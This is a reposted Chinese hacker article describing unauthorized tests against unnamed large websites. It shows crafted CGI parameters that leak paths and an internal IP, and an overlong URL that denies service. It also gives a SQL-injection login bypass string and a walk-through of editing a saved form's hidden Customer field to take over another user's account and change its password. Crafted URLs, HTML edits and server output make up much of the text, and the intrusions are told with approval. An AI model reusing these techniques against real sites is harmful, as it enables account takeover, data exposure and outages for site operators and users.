您的位置:寻梦网首页实用电脑技巧>国内著名网站程序漏洞

国内著名网站程序漏洞

作者:zoomac  来源:孤夜独嚎安全网

近来对系统漏洞, 已经没什么兴趣了。因为现在补丁出得很快。大型网站已经没什么系统问题了。 就算你使用twwwscan, namp等威力挺强的扫描器也不可能扫描出什么东东, 有, 也是欺骗的。但所谓百密必有一疏, 越大的网站需要的脚本也越多, 而脚本是靠个人能力写出来的。能力不够, 。其安全一定存在问题。如果使用免费的脚本,那问题更是多多如果原代码容易得到, 侵入起来太简单了。

强烈建议:不要使用免费的脚本程序, 用了也要注意修改安全上的问题。

WEB脚本大致分为html, asp, cgi, php, jsp, xml, pl...等等。其中cgi的问题居多, 它是比较早期的脚本程序.所以对它的研究也就相对较多。html则是最安全的.因为它功能最少, 脚本也相对少。

最近对一些大型网站(由于某些原因,略去域名)测试了一下, 也发现了几个脚本上的问题(现已修复) 。
http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=10322
将其修改
http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=***
将会暴露绝对路径(可能为了方便调试用, 很多站点都有这问题)
Fail To Load HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs
/club/community/***.htm
接下来
http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=/////////////////////////////////////
长文件名试试^_^, 哈...暴露内部IP了。
Fail To Load HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs/club/community//////////////////////////////////////////
//////////192.168.10.30.htm
再来
http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id='ls'
出现了SQL处理错误.可惜, 没去测试怎利用。
最后
http://bbs.xxxxxxx.com/cgi-bin/user_interface?Pgroup_id=/////////////////////////////
/////////////////////////////////////////////////////////////////////////////
超长文件名攻击(apache对长文件名url很容易出问题)
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, webmaster@tencent.com and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log。
--------------------------------------------------------------------------------
Apache/1.3.12 Server at bbs.xxxxxx.com Port 80
:), 拒绝服务了.估计只是xxx.xxx.xx.xx出问题:),
拒绝服务后, 上面方法测试都已经失效.其它服务正常。
(当时还以为马上打了补丁呢^_^)
这漏洞没什么用处, 只是知道即使大型得网站也有BUG, 呵呵^_^ 

后来又对另外一家大型网站进行了测试:) 

http://training.yyyyyy.com/
测试了几个认证漏洞.包括那1' or passwd 〈〉'1
都没成功:) 后来注册了一个redh, 登陆进去:)
看来看去都没什么..。
接着选了修改[修改个人信息]
进去一看, 就发现问题了:)
里面竟然可以直接修改密码, 并且还有user cookie
OK, 既然发现了, 当然是操作了:)打开原代码-〉搜索一下-〉post
〈form method="post" name=form1 id=form1 action="Myschool/StudentUpdate1.asp"〉
找到这行对action修改一下
〈form method="post" name=form1 id=form1 action="http://training.yyyyyy.com/Myschool/StudentUpdate1.asp"〉
然后再找username
〈tr〉〈td width="16%" class=bt align=right〉* 用户名:〈/td〉
〈td width="32%" class=nr align=left〉redh〈/td〉//用户名:)
改成sp.(你要改的用户名)
然后保存成a.htm运行后, 把密码设置成123(看你喜欢了) 
post过去...恩,
跳到主页了..没成功.。
然后我又看了一下原代码.。
看了这个:
〈input type=hidden name=Customer value="redh"〉
:)原来cookie跑这了.。
OK, 修改一下.。
〈input type=hidden name=Customer value="sp"〉
再post, 哈...成功了.。
登陆sp, 123^_^进去了.看一下资料修改.跟修改时写得一样。
---------------------------------------------
  想说一下, 一个大型网站只要有使用大量脚本程序.肯定存在XX问题的.这问题或许由于疏忽, 也许由于写作功力不足引起的.只要你耐心的找.就会发现.当然对语言肯定也要熟悉的.你不可能说对CGI一点都不会, 但去发现它的问题吧.对网站想说:
1, 少用免费的东东, 便宜没好货。
2, 对安全问题一定要注意.小的疏忽就可能造成大的安全问题